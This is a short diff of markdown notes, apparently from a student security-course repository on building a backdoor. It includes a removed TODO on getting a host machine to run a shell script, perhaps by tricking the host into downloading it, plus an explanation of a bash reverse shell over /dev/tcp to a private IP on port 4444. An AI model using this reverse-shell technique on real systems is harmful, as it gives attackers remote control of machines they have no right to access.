JulianKeller/cs425-backdoor/backdoor/Method1-backdoor.md

 5. on HM type any bash command and hit enter

-# TODO
-how to set the permission of the executable shell script on the host machine?
-	maybe just by getting the host to click download.

-rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file

 # 2 without Netcat installed
 - // 0<&196; open file descriptor and redirect it to stdin.
 196 is a random number
 - // exec 196<>/dev/tcp/192.168.0.xxx/4444; read-write file descriptor,  https://unix.stackexchange.com/questions/164391/how-does-cat-file-work